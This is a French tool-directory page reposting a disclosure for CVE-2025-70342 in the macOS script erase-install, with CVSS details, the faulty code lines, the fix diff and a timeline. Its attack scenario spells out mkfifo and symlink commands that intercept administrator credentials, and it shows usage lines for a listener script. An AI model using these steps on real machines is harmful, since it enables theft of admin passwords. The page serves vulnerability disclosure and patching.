Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-70342 — CVE-2025-70342: Interception d'identifiants via Named Pipe dans erase-install | Kitploit
Outils/GitHubGitHub/malvector/cve-2025-70342
Escalade de PrivilègesAnalyse des VulnérabilitésExploitation
GitHubmalvector/cve-2025-70342

CVE-2025-70342

CVE-2025-70342: Interception d'identifiants via Named Pipe dans erase-install

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-70342 : Interception d'identifiants via un named pipe dans erase-install

Résumé

erase-install antérieur à v40.4 (commit 2c31239) écrit la sortie des identifiants de swiftDialog dans un chemin codé en dur /var/tmp/dialog.json. Sur les Mac Apple Silicon, les identifiants administrateur saisis lors des opérations de réinstallation/effacement sont écrits dans cet emplacement prévisible et accessible en écriture par tous. Un attaquant local non privilégié peut créer un named pipe (FIFO) à ce chemin pour intercepter les identifiants administrateur en temps réel.

Versions concernées

  • Vulnérable : erase-install <= 40.4
  • Corrigé : commit 2c31239 (après la PR #574)

CVSS 3.1

Score : 7.1 (Élevé)

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

MétriqueValeur
Vecteur d'attaqueLocal
Complexité d'attaqueFaible
Privilèges requisFaibles
Interaction utilisateurRequise (l'admin saisit les identifiants)
PortéeInchangée
ConfidentialitéÉlevée
IntégritéÉlevée
DisponibilitéAucune

Détails de la vulnérabilité

Chemin de sortie des identifiants codé en dur (CWE-732)

Fichier : erase-install.sh

Ligne 72 :

root@kitploit:~
dialog_output="/var/tmp/dialog.json"

Ligne 124 :

root@kitploit:~
"$dialog_bin" "${dialog_args[@]}" ... 2>/dev/null > "$dialog_output"

Sur les Mac Apple Silicon, erase-install invite l'administrateur à saisir ses identifiants via swiftDialog. Les identifiants (nom d'utilisateur + mot de passe) sont écrits via une redirection shell vers /var/tmp/dialog.json - un chemin codé en dur dans un répertoire accessible en écriture par tous. Le script ne vérifie pas si ce chemin a été altéré avant d'écrire.

Scénario d'attaque

root@kitploit:~
1. Unprivileged attacker creates a named pipe (FIFO): mkfifo /tmp/.fifo
2. Attacker creates symlink: ln -s /tmp/.fifo /var/tmp/dialog.json
3. Attacker reads from FIFO (blocks, waiting for data)
4. Admin runs: sudo erase-install.sh --erase
5. Admin enters credentials in swiftDialog prompt
6. Credentials flow through symlink → FIFO → attacker's terminal

Cette attaque ne nécessite aucun timing particulier ni condition de concurrence - l'attaquant n'a qu'à placer le symlink et attendre.

Preuve de concept

Prérequis

  • Mac Apple Silicon (l'invite d'identifiants ne se déclenche que sur arm64)
  • N'importe quel compte utilisateur local non privilégié

Utilisation

root@kitploit:~
# Start the listener (as unprivileged user)
python3 poc.py

# Wait for admin to run erase-install with --erase or --reinstall
# Credentials will be printed to stdout when captured

# Cleanup
python3 poc.py --cleanup

Voir poc.py pour tous les détails.

Correctif

  • Mettez à niveau erase-install vers la version contenant le commit 2c31239 ou une version ultérieure
  • Le correctif utilise mktemp pour générer un nom de fichier aléatoire, empêchant la prédiction du chemin :
root@kitploit:~
- dialog_output="/var/tmp/dialog.json"
+ dialog_output=$(/usr/bin/mktemp /var/tmp/dialog.XXX.json)

Chronologie

DateÉvénement
2025-12-23Vulnérabilité découverte
2025-12-23Problème signalé au mainteneur
2025-12-24Correctif fusionné via la PR #574

Crédits

  • cooldadhacking (GitHub)

Références

  • erase-install PR #574
  • Commit de correction 2c31239

Avertissement

Cette preuve de concept est fournie à des fins éducatives et de tests de sécurité autorisés uniquement. Utilisez-la de manière responsable et uniquement sur des systèmes vous appartenant ou pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil
2026-02-20CVE-2025-70342 attribué